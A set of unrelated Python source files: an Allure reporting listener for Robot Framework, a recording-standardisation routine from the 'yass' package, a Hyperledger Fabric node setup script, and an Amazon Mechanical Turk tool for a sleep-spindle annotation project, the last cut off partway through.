self.threadId = 'PabotPoolId-' + str(self.PabotPoolId)
else:
self.threadId = threading._get_ident()
test.labels.append(TestLabel(
name='thread',
value=str(self.threadId)))
self.testsuite.tests.append(test)
test.stop = now()
return test
def start_test(self, name, attributes):
if len(str(attributes.get('doc'))) > 0:
description = str(attributes.get('doc'))
else:
description = name
test = TestCase(name=name,
description=description,
start=now(),
attachments=[],
labels=[],
steps=[],
severity='normal')
self.stack.append(test)
return
def end_test(self, name, attributes):
# logger.console('\nend_test: ['+name+']')
# logger.console(attributes)
# logger.console(' [stack length] ['+str(len(self.stack))+'] [testsuite length] ['+ str(len(self.testsuite.tests))+']')
test = self.stack.pop()
if attributes.get('status') == Robot.PASS:
test.status = Status.PASSED
elif attributes.get('status')==Robot.FAIL:
test.status = Status.FAILED
test.failure = Failure(message=attributes.get('message'), trace='')
elif attributes.get('doc') != '':
test.description = attributes.get('doc')
if attributes['tags']:
for tag in attributes['tags']:
if re.search(self.AllureIssueIdRegEx, tag):
test.labels.append(TestLabel(
name=Label.ISSUE,
value=tag))
elif tag.startswith('feature'):
test.labels.append(TestLabel(
name='feature',
value=tag.split(':')[-1]))
elif tag.startswith('story'):
test.labels.append(TestLabel(
name='story',
value=tag.split(':')[-1]))
elif tag in SEVERITIES:
test.labels.append(TestLabel(
name='severity',
value=tag))
test.severity = tag
elif tag in STATUSSES:
test.status = tag # overwrites the actual test status with this value.
else:
test.labels.append(TestLabel(
name='tag',
value=tag))
self.PabotPoolId = BuiltIn().get_variable_value('${PABOTEXECUTIONPOOLID}')
if(self.PabotPoolId is not None):
self.threadId = 'PabotPoolId-' + str(self.PabotPoolId)
else:
self.threadId = threading._get_ident()
test.labels.append(TestLabel(
name='thread',
value=str(self.threadId)))
self.testsuite.tests.append(test)
test.stop = now()
return test
def start_suite(self, name, attributes):
self.SuitSrc = BuiltIn().get_variable_value('${SUITE_SOURCE}')
self.ExecDir = BuiltIn().get_variable_value('${EXECDIR}')
# Reading the Allure Properties file for the Issue Id regular expression
# for the Issues and the URL to where the Issues/Test Man links should go.
if(self.AllurePropPath is None):
self.AllurePropPath = self.ExecDir + '\\allure.properties'
if os.path.exists(self.AllurePropPath) is True:
self.AllureProperties = AllureProperties(self.AllurePropPath)
self.AllureIssueIdRegEx = self.AllureProperties.get_property('allure.issues.id.pattern')
else:
self.AllureProperties = AllureProperties(self.AllurePropPath)
self.AllureIssueIdRegEx = self.AllureProperties.get_property('allure.issues.id.pattern')
# Not using &{ALLURE} as this is throwing an error and ${ALLURE} gives the
# desired dictionary in Allure as well.
BuiltIn().set_global_variable('${ALLURE}', self.AllureProperties.get_properties())
# When running a Robot folder, the folder itself is also considered a Suite
# The full check depends on the availability of all the vars which are
# only available when a Robot file has started.
IsSuiteDirectory = os.path.isdir(self.SuitSrc)
if(not(IsSuiteDirectory)):
''' Check if class received Output Directory Path in the properties file. '''
if self.AllureProperties.get_property('allure.cli.logs.xml') is None:
''' No Path was provided, so using output dir with additional sub folder. '''
self.allurelogdir = BuiltIn().get_variable_value('${OUTPUT_DIR}') + "\\Allure"
else:
self.allurelogdir = self.AllureProperties.get_property('allure.cli.logs.xml')
self.AllureImplc = AllureImpl(self.allurelogdir)
''' Clear the directory but not if run in parallel mode in Pabot'''
PabotPoolId = BuiltIn().get_variable_value('${PABOTEXECUTIONPOOLID}')
try:
if(self.isFirstSuite == True
and self.AllureProperties.get_property('allure.cli.logs.xml.clear') == 'True'
and PabotPoolId is None):
clear_directory(self.AllureProperties.get_property('allure.cli.logs.xml'))
except Exception as e:
logger.console(pprint.pformat(e))
finally:
self.isFirstSuite = False
if attributes.get('doc') != '':
description = attributes.get('doc')
else:
description = name
self.testsuite = TestSuite(name=name,
title=name,
description=description,
tests=[],
labels=[],
start=now())
return
def end_suite(self, name, attributes):
self.testsuite.stop = now()
logfilename = '%s-testsuite.xml' % uuid.uuid4()
# When running a folder, the folder itself is also considered a Suite
# The full check depends on the availability of all the vars which are
# only available when a Robot file has started.
IsSuiteDirectory = os.path.isdir(BuiltIn().get_variable_value("${SUITE_SOURCE}"))
if(not(IsSuiteDirectory)):
with self.AllureImplc._reportfile(logfilename) as f:
self.AllureImplc._write_xml(f, self.testsuite)
return
def start_keyword(self, name, attributes):
# logger.console('\nstart_keyword: ['+name+']')
# logger.console(' ['+attributes['type']+'] [stack length] ['+str(len(self.stack))+'] [testsuite length] ['+ str(len(self.testsuite.tests))+']')
if(hasattr(self, attributes.get('kwname').replace(" ", "_")) and callable(getattr(self, attributes.get('kwname').replace(" ", "_")))):
libraryMethodToCall = getattr(self, attributes.get('kwname').replace(" ", "_"))
result = libraryMethodToCall(name, attributes)
keyword = TestStep(name=name,
title=attributes.get('kwname'),
attachments=[],
steps=[],
start=now(),)
if self.stack:
self.stack.append(keyword)
return keyword
if(attributes.get('type') == 'Keyword' or (attributes.get('type') == 'Teardown' and len(self.stack) != 0)):
keyword = TestStep(name=name,
title=attributes.get('kwname'),
attachments=[],
steps=[],
start=now(),)
if self.stack:
self.stack.append(keyword)
return keyword
"""
Processing the Suite Setup.
Although there is no test case yet, a virtual one is created to allow
for the inclusion of the keyword.
"""
if(attributes.get('type') == 'Setup' and len(self.stack) == 0):
self.start_suitesetup(name, attributes)
return
if(attributes.get('type') == 'Teardown' and len(self.stack) == 0):
self.start_suitesetup(name, attributes)
return
def end_keyword(self, name, attributes):
# logger.console('\nend_keyword: ['+name+']')
# logger.console(' ['+attributes['type']+'] [stack length] ['+str(len(self.stack))+'] [testsuite length] ['+ str(len(self.testsuite.tests))+']')
if len(self.stack) > 0:
if(attributes.get('type') == 'Keyword' or (attributes.get('type') == 'Teardown' and isinstance(self.stack[-1], TestStep) is True)):
step = self.stack.pop()
if(attributes.get('status') == 'FAIL'):
step.status = 'failed'
elif(attributes.get('status') == 'PASS'):
step.status = 'passed'
step.stop = now()
# Append the step to the previous item. This can be another step, or
# another keyword.
self.stack[-1].steps.append(step)
return
if(attributes.get('type') == 'Setup' and len(self.testsuite.tests) == 0):
self.end_suitesetup(name, attributes)
return
if(attributes.get('type') == 'Teardown' and isinstance(self.stack[-1], TestCase) is True):
self.end_suitesetup(name, attributes)
return
return
def message(self, msg):
pass
def log_message(self, msg):
# logger.console(pprint.pformat(msg))
# logger.console(self.stack[-1].title)
# Check to see if there are any items to add the log message to
# this check is needed because otherwise Suite Setup may fail.
if len(self.stack) > 0:
if self.stack[-1].title == 'Capture Page Screenshot':
screenshot = re.search('[a-z]+-[a-z]+-[0-9]+.png',msg['message'])
if screenshot:
self.attach('{}'.format(screenshot.group(0)) , screenshot.group(0))
if(msg['html']=='yes'):
screenshot = re.search('[a-z]+-[a-z]+-[0-9]+.png',msg['message'])
kwname = '{}'.format(screenshot.group(0))
# logger.console('kwname: '+kwname)
else:
kwname = msg['message']
startKeywordArgs= {'args': [],
'assign': [],
'doc': '',
'kwname': kwname,
'libname': 'BuiltIn',
'starttime': now(),
'tags': [],
'type': 'Keyword'}
self.start_keyword('Log Message', startKeywordArgs)
endKeywordArgs= {'args': [],
'assign': [],
'doc': '',
'elapsedtime': 0,
'endtime': now(),
'kwname': kwname,
'libname': 'BuiltIn',
'starttime': now(),
'status': 'PASS',
'tags': [],
'type': 'Keyword'}
self.end_keyword('Log Message', endKeywordArgs)
return
def close(self):
IsSuiteDirectory = os.path.isdir(self.SuitSrc)
if(not(IsSuiteDirectory)):
self.save_environment()
# self.save_properties()
self.AllureProperties.save_properties()
if (self.AllureProperties.get_property('allure.cli.outputfiles') and self.PabotPoolId is None):
self.allure(self.AllureProperties)
return
# Helper functions
def save_environment(self):
environment = {}
environment['id'] = 'Robot Framework'
environment['name'] = socket.getfqdn()
environment['url']= 'http://'+socket.getfqdn()+':8000'
env_dict = (\
{'Robot Framework Full Version': get_full_version()},\
{'Robot Framework Version': get_version()},\
{'Interpreter': get_interpreter()},\
{'Python version': sys.version.split()[0]},\
{'Allure Adapter version': VERSION},\
{'Robot Framework CLI Arguments': sys.argv[1:]},\
{'Robot Framework Hostname': socket.getfqdn()},\
{'Robot Framework Platform': sys.platform}\
)
for key in env_dict:
self.AllureImplc.environment.update(key)
self.AllureImplc.logdir = self.AllureProperties.get_property('allure.cli.logs.xml')
self.AllureImplc.store_environment(environment)
def allure(self, AllureProps):
JAVA_PATH= AllureProps.get_property('allure.java.path')
ALLURE_HOME= '-Dallure.home='+AllureProps.get_property('allure.home')
JAVA_CLASSPATH= '-cp "'+ AllureProps.get_property('allure.java.classpath')+'"'
ALLURE_LOGFILE= AllureProps.get_property('allure.cli.logs.xml')
ALLURE_OUTPUT= '-o '+ AllureProps.get_property('allure.cli.logs.output')
JAVA_CLASS= 'ru.yandex.qatools.allure.CommandLine'
ALLURE_COMMAND= 'generate'
ALLURE_URL= AllureProps.get_property('allure.results.url')
allure_cmd = JAVA_PATH + ' ' + ALLURE_HOME + ' ' + JAVA_CLASSPATH + ' ' + JAVA_CLASS + ' ' + ALLURE_COMMAND + ' ' + ALLURE_LOGFILE + ' ' + ALLURE_OUTPUT
if(AllureProps.get_property('allure.cli.outputfiles')=='True'):
FNULL = open(os.devnull, 'w') #stdout=FNULL,
subprocess.Popen(allure_cmd, stderr=subprocess.STDOUT, shell=True).wait()
if(AllureProps.get_property('allure.results.browser.open')=='True'):
webbrowser.open(ALLURE_URL, new=0, autoraise=True)
def attach(self, title, contents, attach_type=AttachmentType.PNG):
"""
This functions created the attachments and append it to the test.
"""
# logger.console("attach-title: "+title)
contents = os.path.join(BuiltIn().get_variable_value('${OUTPUT_DIR}'), contents)
with open(contents, 'rb') as f:
file_contents = f.read()
attach = Attach(source=self.AllureImplc._save_attach(file_contents, attach_type),
title=title,
type=attach_type)
self.stack[-1].attachments.append(attach)
return
def Set_Output_Dir(self, name, attributes):
copy_dir_contents(self.AllureProperties.get_property('allure.cli.logs.xml'), attributes['args'][0])
self.AllureProperties.set_property('allure.cli.logs.xml', attributes['args'][0])
self.AllureImplc.logdir = attributes['args'][0]
|
<gh_stars>0
"""
Recording standardization
"""
import multiprocess
import os.path
from yass.batch import BatchProcessor
from yass.util import check_for_files, ExpandPath, LoadFile
import numpy as np
@check_for_files(filenames=[ExpandPath('output_filename'),
LoadFile('output_filename', 'yaml')],
mode='extract', relative_to='output_path')
def standarize(path_to_data, dtype, n_channels, data_order,
sampling_frequency, max_memory, output_path,
output_dtype, output_filename='standarized.bin',
if_file_exists='skip', processes='max'):
"""
Standarize recordings in batches and write results to disk. Standard
deviation is estimated using the first batch
Parameters
----------
path_to_data: str
Path to recordings in binary format
dtype: str
Recordings dtype
n_channels: int
Number of channels in the recordings
data_order: str
Recordings order, one of ('channels', 'samples'). In a dataset with k
observations per channel and j channels: 'channels' means first k
contiguous observations come from channel 0, then channel 1, and so
on. 'samples' means first j contiguous data are the first observations
from all channels, then the second observations from all channels and
so on
sampling_frequency: int
Recordings sampling frequency in Hz
max_memory: str
Max memory to use in each batch (e.g. 100MB, 1GB)
output_path: str
Where to store the standarized recordings
output_dtype: str
dtype for standarized data
output_filename: str, optional
Filename for the output data, defaults to standarized.bin
if_file_exists: str, optional
One of 'overwrite', 'abort', 'skip'. If 'overwrite' it replaces the
standarized data if it exists, if 'abort' it raises a ValueError
exception if the file exists, if 'skip' it skips the operation if the
file exists
processes: str or int, optional
Number of processes to use, if 'max', it uses all cores in the machine
if a number, it uses that number of cores
Returns
-------
standarized_path: str
Path to standarized recordings
standarized_params: dict
A dictionary with the parameters for the standarized recordings
(dtype, n_channels, data_order)
"""
processes = multiprocess.cpu_count() if processes == 'max' else processes
_output_path = os.path.join(output_path, output_filename)
# init batch processor
bp = BatchProcessor(path_to_data, dtype, n_channels, data_order,
max_memory)
sd = standard_deviation(bp, sampling_frequency)
def divide(rec):
return np.divide(rec, sd)
# apply transformation
(standarized_path,
standarized_params) = bp.multi_channel_apply(divide,
mode='disk',
output_path=_output_path,
cast_dtype=output_dtype,
processes=processes)
return standarized_path, standarized_params
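# Illustrative usage sketch (file names and parameter values below are
# assumptions for demonstration only, not taken from an actual pipeline):
#
#   standarized_path, params = standarize(
#       path_to_data='data/recording.bin', dtype='int16', n_channels=512,
#       data_order='samples', sampling_frequency=30000, max_memory='500MB',
#       output_path='output/', output_dtype='float32')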
def standard_deviation(batch_processor, sampling_frequency,
preprocess_fn=None):
"""Estimate standard deviation using the first batch in a large file
"""
# read a batch from all channels
batches = batch_processor.multi_channel()
first_batch = next(batches)
if preprocess_fn:
first_batch = preprocess_fn(first_batch)
# estimate standard deviation using the first batch
sd = _standard_deviation(first_batch, sampling_frequency)
return sd
def _standard_deviation(rec, sampling_freq):
"""Determine standard deviation of noise in each channel
Parameters
----------
rec : matrix [length of recording, number of channels]
sampling_freq : int
the sampling rate (in Hz)
Returns
-------
sd : vector [number of channels]
standard deviation in each channel
"""
# if the recording is long enough, only use the middle 5 seconds of
# data
small_t = np.min((int(sampling_freq*5), rec.shape[0]))
mid_T = int(np.ceil(rec.shape[0]/2))
rec_temp = rec[int(mid_T-small_t/2):int(mid_T+small_t/2)]
# find standard deviation using robust method
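# (The 0.6745 divisor rescales the median absolute value so that, for
# zero-mean Gaussian noise, the result approximates the standard deviation;
# 0.6745 is roughly the 75th percentile of the standard normal distribution.)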
sd = np.median(np.abs(rec_temp), 0)/0.6745
return sd
|
# Copyright 2018 Owkin, inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from subprocess import call
from utils.setup_utils import registerIdentities, registerUsers, generateGenesis, enrollWithFiles, genTLSCert, writeFile
from utils.common_utils import create_directory
SUBSTRA_PATH = os.getenv('SUBSTRA_PATH', '/substra')
def generateMSPandTLS(node, org, msp_dir, admincerts=False):
##################################################################################################################
# Although a peer may use the same TLS key and certificate file for both inbound and outbound TLS, #
# we generate a different key and certificate for inbound and outbound TLS simply to show that it is permissible #
##################################################################################################################
# Node peer/orderer mounted volume, see docker_utils 'Client/Server TLS' bound volume.
tls_setup_dir = node['tls']['dir']['external']
# create external folders (client and server)
tls_server_dir = os.path.join(tls_setup_dir, node['tls']['server']['dir'])
tls_client_dir = os.path.join(tls_setup_dir, node['tls']['client']['dir'])
# Generate server TLS cert and key pair in container
genTLSCert(node, org,
cert_file=os.path.join(tls_server_dir, node['tls']['server']['cert']),
key_file=os.path.join(tls_server_dir, node['tls']['server']['key']),
ca_file=os.path.join(tls_server_dir, node['tls']['server']['ca']))
# Generate client TLS cert and key pair for the peer CLI (will be used by external tools)
# in a bound volume
genTLSCert(node, org,
cert_file=os.path.join(tls_client_dir, node['tls']['client']['cert']),
key_file=os.path.join(tls_client_dir, node['tls']['client']['key']),
ca_file=os.path.join(tls_client_dir, node['tls']['client']['ca']))
# Enroll the node to get an enrollment certificate and set up the core's local MSP directory for starting the node
enrollWithFiles(node, org, msp_dir, admincerts=admincerts)
def init_org(conf, enrollmentAdmin):
for peer in conf['peers']:
setup_peer_msp_dir = os.path.join(conf['core_dir']['internal'], peer['name'], 'msp')
generateMSPandTLS(peer, conf, setup_peer_msp_dir, admincerts=False)
# copy the admincerts from the admin user so that chaincode can be installed
# https://stackoverflow.com/questions/48221810/what-is-difference-between-admincerts-and-signcerts-in-hyperledge-fabric-msp
# https://lists.hyperledger.org/g/fabric/topic/17549225#1250
# https://github.com/hyperledger/fabric-sdk-go/blob/master/internal/github.com/hyperledger/fabric/msp/mspimpl.go#L460
# https://jira.hyperledger.org/browse/FAB-3840
admin = conf['users']['admin']
filename = os.path.join(setup_peer_msp_dir, 'admincerts', '%s-cert.pem' % admin['name'])
writeFile(filename, enrollmentAdmin._cert)
def init_orderer(conf):
for orderer in conf['orderers']:
setup_orderer_msp_dir = os.path.join(conf['core_dir']['internal'], orderer['name'], 'msp')
# copy the admincerts from the user so that the orderer can be launched
generateMSPandTLS(orderer, conf, setup_orderer_msp_dir, admincerts=True)
def init(conf, enrollmentAdmin):
if 'peers' in conf:
init_org(conf, enrollmentAdmin)
if 'orderers' in conf:
init_orderer(conf)
create_directory(conf['broadcast_dir']['external'])
generateGenesis(conf)
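# Rough sketch of the conf.json structure this script reads (keys inferred
# from the accesses above; the actual file is produced elsewhere in the
# Substra setup and may contain additional fields):
#
#   {
#     "peers": [...], "orderers": [...], "users": {"admin": {...}},
#     "core_dir": {"internal": "..."},
#     "broadcast_dir": {"external": "..."},
#     "misc": {"setup_success_file": "..."}
#   }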
if __name__ == '__main__':
conf = json.load(open(f'{SUBSTRA_PATH}/conf.json', 'r'))
registerIdentities(conf)
enrollmentAdmin = registerUsers(conf)
init(conf, enrollmentAdmin)
print('Finished setup', flush=True)
call(['touch', conf['misc']['setup_success_file']])
|
# -*- coding: utf-8 -*-
# coding=utf-8
__author__ = 'ben'
import os
from os import walk
import boto.mturk.connection
from boto.s3.connection import S3Connection
from boto.mturk.qualification import LocaleRequirement, Qualifications, Requirement
import datetime
import csv
import yaml
import sys
import pandas as pd
import codecs
from pprint import pprint
sandbox_host = 'mechanicalturk.sandbox.amazonaws.com'
real_host = 'mechanicalturk.amazonaws.com'
host = os.environ['MODA_MTURK_HOST']
hosts={
'sandbox':'mechanicalturk.sandbox.amazonaws.com',
'real':'mechanicalturk.amazonaws.com'
}
phasesQualID = {
'sandbox': {
'practice': '3LJ6LLBDMBQTWUTLG75O5EUQMZM6A6',
'phase1': '3OFCXZK7I1YMQQ45Q5LPJ2OOHCHK93'
},
'real': {
'practice': '3EOSKS3N0DQYQTMKNK1E0HHQOWRVU1',
'phase1': '3874R5DF6Q5C7TEUP9O1NNJXLRMPJ6'
}
}
myWorkerID = {
'sandbox': 'A2SI2XQA7HPR8V',
'real': 'A2SI2XQA7HPR8V'
}
testingQual = '35NJKTSSL0Z7GHLPTM145UTQ6PFZXY'
class MturkTools:
"""Tools for mturk"""
def __init__(self):
self.phase = 'phase1experts4'
self.expert_only = True
self.phase_to_save = {'phase1'}
self.date_str = datetime.date.today().isoformat()
self.path = '/mnt/c/Users/bdyet/GoogleDrive/MODA/DownloadUserData/'
if not os.path.exists(self.path+self.phase):
os.makedirs(self.path+self.phase)
self.url = "https://shrouded-plains-8041.herokuapp.com/"
self.mturk = boto.mturk.connection.MTurkConnection(
aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],
aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],
host=hosts[host],
debug=1 # debug = 2 prints out all requests.
)
self.titles_to_remove = ['Find patterns in sleeping brainwaves (Training HIT)', 'Find patterns in sleeping brainwaves']
print("Welcome to mturk tools, your balance is:")
accountBal = self.mturk.get_account_balance() # [$10,000.00]
print(accountBal)
if host == 'sandbox' and accountBal[0] != '10,000.00':
print('Error, you are meant to be in sandbox but you are not!')
sys.exit()
def get_all_user_data_from_aws(self):
s3 = S3Connection(os.environ['AWS_ACCESS_KEY_ID'], os.environ['AWS_SECRET_ACCESS_KEY'])
bucket = s3.get_bucket('moss-assets')
bucket_list = bucket.list()
i=0
for l in bucket_list:
key_string = str(l.key)
if self.expert_only:
str2check = 'UserData_expert'
else:
str2check = 'UserData'
if key_string.find(str2check) != -1:
print('Downloading ' + key_string)
l.get_contents_to_filename(self.path+self.phase + '/' +key_string)
i += 1
print("%i user data files downloaded" % i)
def parse_aws_to_csv(self):
mypath = self.path+self.phase + '/'
for (dirpath, dirnames, filenames) in walk(mypath):
break
with open(mypath+'EventLocations' + self.date_str + '.csv', 'w') as event_loc_csv_file:
event_loc_csv_writer = csv.writer(event_loc_csv_file)
event_loc_csv_writer.writerow(['filename',
'phase',
'subID',
'epochNum',
'blockNum',
'annotatorID',
'MODA_batchNum',
'annotatorEventIndex',
'startPercent',
'durationPercent',
'startSecs',
'durationSecs',
'scoreConfidence',
'TimeWindowFirstShown',
'TimeMarkerCreated',
'TimeMarkerLastModified',
'turkHitId',
'turkAssignmentId'])
with open(mypath+'EpochViews' + self.date_str + '.csv', 'w') as epoch_csv_file:
epoch_csv_writer = csv.writer(epoch_csv_file)
epoch_csv_writer.writerow(['filename',
'epochNum',
'blockNum',
'phase',
'annotatorID',
'hitId',
'assignmentId'])
with open(mypath+'UserStats' + self.date_str + '.csv', 'w') as user_stats_csv_file:
user_stats_csv_writer = csv.writer(user_stats_csv_file)
user_stats_csv_writer.writerow(['userName',
'email',
'fname',
'lname',
'userType',
'userSubType',
'totalSetsScored',
'totalEpochsScored',
'totalMarkersScored',
'RPSGT',
'yearsExperience',
'spindleHoursOverLifetime',
'whyQualified',
'otherComments'])
for userFile in filenames: # collate markers, and collate batches
try:
if not (userFile.find('UserData') > -1):
continue
with open(mypath + '/' + userFile) as userFileHandle:
if userFile == "UserData_preview":
continue
user_data = yaml.safe_load(userFileHandle)
try:
if 'userName' not in user_data:
continue
print("working on user %s" % user_data['userName'])
dataExists = False
epochs_complete = 0
markers_complete = 0
except:
print(userFile)
for phase in user_data['batches']:
if phase not in self.phase_to_save:
continue
sets_comp = user_data['setsCompleted'][phase]
print(" Sets completed in {0}: {1}".format(phase, sets_comp))
for batch in user_data['batches'][phase]:
if batch == 'batchMeta':
continue
for img in user_data['batches'][phase][batch]['imgs']:
img_data = user_data['batches'][phase][batch]['imgs'][img]
if len(img_data['markers']) > 0 or img_data['noMarkers'] == 'true' or ('mturkInfo' in img_data):
dataExists = True
epochs_complete += 1
if user_data['userType'] == 'mturker':
assignment_id = img_data['mturkInfo']['assignmentId']
hit_id = img_data['mturkInfo']['hitId']
else:
hit_id = None
assignment_id = None
epoch_csv_writer.writerow([img_data['filename'],
img_data['epoch'],
img_data['batch'],phase,
user_data['userName'],
hit_id,
assignment_id])
for marker in img_data['markers']:
if marker['gs'] == 'true' or marker['deleted'] == 'true':
continue
markers_complete += 1
event_loc_csv_writer.writerow([img_data['filename'],
phase,
img_data['subID'],
img_data['epoch'],
img_data['batch'],
user_data['userName'],
batch,
marker['markerIndex'],
marker['xP'],
marker['wP'],
marker['xSecs'],
marker['wSecs'],
marker['conf'],
marker['imgFirstShown'],
marker['markerCreated'],
marker['timeStamp'],
hit_id,
assignment_id])
if not dataExists:
print("ERROR, %s has a file but did not complete any images. " % user_data['userName'])
except:
print("Massive Error somewhere with {0}".format(user_data['userName']))
if user_data['userType'] == 'mturker':
user_subtype = None
rpsgt = None
email = None
years_experience = None
spindle_hours_over_lifetime = None
why_qualified = None
other_comments = None
else:
email = user_data['registerData']['email']
other_comments = user_data['registerData']['comments']
if 'RPSGTNum' in user_data['registerData']:
user_subtype = 'psgTech'
rpsgt = user_data['registerData']['RPSGTNum']
years_experience = user_data['registerData']['yearsExperience']
spindle_hours_over_lifetime = None
why_qualified = None
elif 'other' in user_data['registerData']:
user_subtype = 'other'
why_qualified = user_data['registerData']['other']
rpsgt = None
years_experience = user_data['registerData']['yearsExperience']
spindle_hours_over_lifetime = user_data['registerData']['timeWorked']
else:
user_subtype = 'researcher'
spindle_hours_over_lifetime = user_data['registerData']['timeWorked']
rpsgt = None
years_experience = user_data['registerData']['yearsExperience']
why_qualified = None
if spindle_hours_over_lifetime is not None:
try:
spindle_hours_over_lifetime = unicode(spindle_hours_over_lifetime.strip(codecs.BOM_UTF8),'utf-8')
except:
spindle_hours_over_lifetime = 'conversion error'
if why_qualified is not None:
try:
why_qualified = unicode(why_qualified.strip(codecs.BOM_UTF8), 'utf-8')
except:
why_qualified = 'conversion error'
if other_comments is not None:
try:
other_comments = unicode(other_comments.strip(codecs.BOM_UTF8), 'utf-8')
except:
other_comments = 'conversion error'
if 'fname' in user_data:
fname = user_data['fname']
else:
fname = 'missing'
if 'lname' in user_data:
lname = user_data['lname']
else:
lname = 'missing'
user_stats_csv_writer.writerow([user_data['userName'],
email,
fname,
lname,
user_data['userType'],
user_subtype,
sets_comp,
epochs_complete,
markers_complete,
rpsgt,
years_experience,
spindle_hours_over_lifetime,
why_qualified,
other_comments])
user_stats_csv_file.close()
epoch_csv_file.close()
event_loc_csv_file.close()
def save_mturk_data(self):
hits = self.get_all_reviewable_hits()
try:
workerResultData = pd.read_csv(self.path+self.phase + "/WorkerResultData.csv", sep=',')
except:
workerResultData = pd.DataFrame(columns={'workerId', 'viewedImgs', 'numViewed', 'numHits', 'browser'})
for hit in hits:
assignments = self.mturk.get_assignments(hit.HITId)
for assignment in assignments:
print("Answers of the worker %s" % assignment.WorkerId)
for answer in assignment.answers:
for idx, ans in enumerate(answer):
if idx == 2:
for viewedImg in ans.fields:
browser = viewedImg
print(browser)
elif idx == 3:
for viewedImg in ans.fields:
print(viewedImg)
viewedImg = viewedImg.split(',')
if len(viewedImg)<1 or viewedImg==None:
print("Missing DATA for {0}".format(assignment.WorkerId))
print(viewedImg)
continue
if assignment.WorkerId not in workerResultData['workerId'].values:
ser = pd.Series([assignment.WorkerId, viewedImg, len(viewedImg), 1, browser], index=['workerId','viewedImgs','numViewed','numHits','browser'])
workerResultData = workerResultData.append(ser, ignore_index=True)
else:
currentData = workerResultData.loc[workerResultData['workerId']==assignment.WorkerId, 'viewedImgs']
currentNumViewed = workerResultData.loc[workerResultData['workerId']==assignment.WorkerId, 'numViewed']
currentNumHits = workerResultData.loc[workerResultData['workerId']==assignment.WorkerId, 'numHits']
if not set(viewedImg).issubset(currentData.values[0]):
currentDataValue = currentData.values[0]
if isinstance(currentDataValue, basestring):
currentDataValue = currentDataValue.split(',')
workerLoc = workerResultData['workerId']==assignment.WorkerId
currentDataValue.extend(viewedImg)
workerResultData.loc[workerLoc, 'viewedImgs'] = [currentDataValue]
workerResultData.loc[workerLoc, 'numViewed'] = currentNumViewed+len(viewedImg)
workerResultData.loc[workerLoc, 'numHits'] = currentNumHits+1
workerResultData.to_csv(self.path+self.phase + "/WorkerResultData.csv")
def get_all_reviewable_hits(self):
page_size = 50
hits = self.mturk.get_reviewable_hits(page_size=page_size)
print("Total results to fetch %s " % hits.TotalNumResults)
print("Request hits page %i" % 1)
total_pages = float(hits.TotalNumResults)/page_size
int_total = int(total_pages)
if total_pages - int_total > 0:
total_pages = int_total+1
else:
total_pages = int_total
pn = 1
while pn < total_pages:
pn += 1
print("Request hits page %i" % pn)
temp_hits = self.mturk.get_reviewable_hits(page_size=page_size,page_number=pn)
hits.extend(temp_hits)
return hits
def get_all_hits(self):
return self.mturk.get_all_hits()
def approve_hits(self):
reviewable_hits = self.get_all_reviewable_hits()
for hit in reviewable_hits:
assignments = self.mturk.get_assignments(hit.HITId)
for assignment in assignments:
print("Worker %s" % assignment.WorkerId)
try:
self.mturk.approve_assignment(assignment.AssignmentId)
except:
print("already approved")
print("--------------------")
self.mturk.disable_hit(hit.HITId)
def disable_all_hits(self):
allHits = self.mturk.get_all_hits()
for hit in allHits:
if hit.Title in self.titles_to_remove:
print('deleting')
self.mturk.disable_hit(hit.HITId)
def dispose_reviewed_hits(self):
allHits = self.mturk.get_all_hits()
for hit in allHits:
if hit.Title in self.titles_to_remove:
print('disposing')
self.mturk.dispose_hit(hit.HITId)
def expire_remaining_hits(self):
allHits = self.mturk.get_all_hits()
for hit in allHits:
if hit.Title in self.titles_to_remove:
print('expiring {0}'.format(hit.Title))
self.mturk.expire_hit(hit.HITId)
def remove_qualifications(self, phase_type, workers_to_remove='me'):
if workers_to_remove != 'me':
qual_data= self.mturk.get_all_qualifications_for_qual_type(phasesQualID[host][phase_type])
workers = []
for worker in qual_data:
workers.append(worker.SubjectId)
else:
workers = [myWorkerID[host]]
for workerID in workers:
try:
self.mturk.revoke_qualification(workerID, phasesQualID[host][phase_type], reason='Granted in error')
except:
print('worker %s does not have qual' % workerID)
def post_prac_hits(self, num_hits, amount, testing=False):
title = "Find patterns in sleeping brainwaves (Training HIT)"
description = "This is a training hit which will grant you a qualification to complete more HITs." \
"Expected HIT completion time is 12mins (because you have to read instructions etc)," \
" BUT future HITs will be shorter!!!" \
"Your job is to find patterns in recordings of the sleeping brain! Help science understand " \
"sleep and its memory benefits. \n" \
"This project is run by the MODA team at University of California, Riverside." \
"If you would like to find out more about this project please visit our Open Science Project" \
"at https://osf.io/8bma7/ or consider backing our project on " \
"Experiment: https://experiment.com/projects/crowdsourcing-the-analysis-of-sleep-can-the-public-be-sleep-scientists"
keywords = ["sleep", "scoring","spindles","spindle","brainwaves", "MODA", "psych", "annotation"]
frame_height = 800 # the height of the iframe holding the external hit
questionform = boto.mturk.question.ExternalQuestion(self.url + '?currentPhase=practice', frame_height)
quals = Qualifications()
quals.add(Requirement('000000000000000000L0', 'GreaterThanOrEqualTo', '95')) #'Worker_PercentHITsApproved'
quals.add(Requirement(phasesQualID[host]['practice'], 'DoesNotExist'))
quals.add(Requirement(phasesQualID[host]['phase1'], 'DoesNotExist'))
if host != 'sandbox':
if testing:
quals.add(Requirement(testingQual, 'Exists'))
else:
quals.add(Requirement('00000000000000000040', 'GreaterThanOrEqualTo', '100')) #'Worker_NumberHITsApproved'
i=0
for i in range(1, num_hits+1):
self.mturk.create_hit(
title=title,
description=description,
keywords=keywords,
question=questionform,
reward=boto.mturk.price.Price(amount=amount),
lifetime=datetime.timedelta(4),
duration=datetime.timedelta(minutes=30),
qualifications=quals,
response_groups=('Minimal', 'HITDetail'), # I don't know what response groups are
)
print('Posted ' + str(i) + ' practice HITS @ $' + str(amount))
def post_futher_hits(self, num_hits, amount, testing=False):
url = "https://shrouded-plains-8041.herokuapp.com/"
title = "Find patterns in sleeping brainwaves"
description = "Expected HIT completion time is ~3 mins.\n\n" \
"Your job is to find patterns in recordings of the sleeping brain! Help science understand " \
"sleep and its memory benefits. \n" \
"This project is run by the MODA team at University of California, Riverside." \
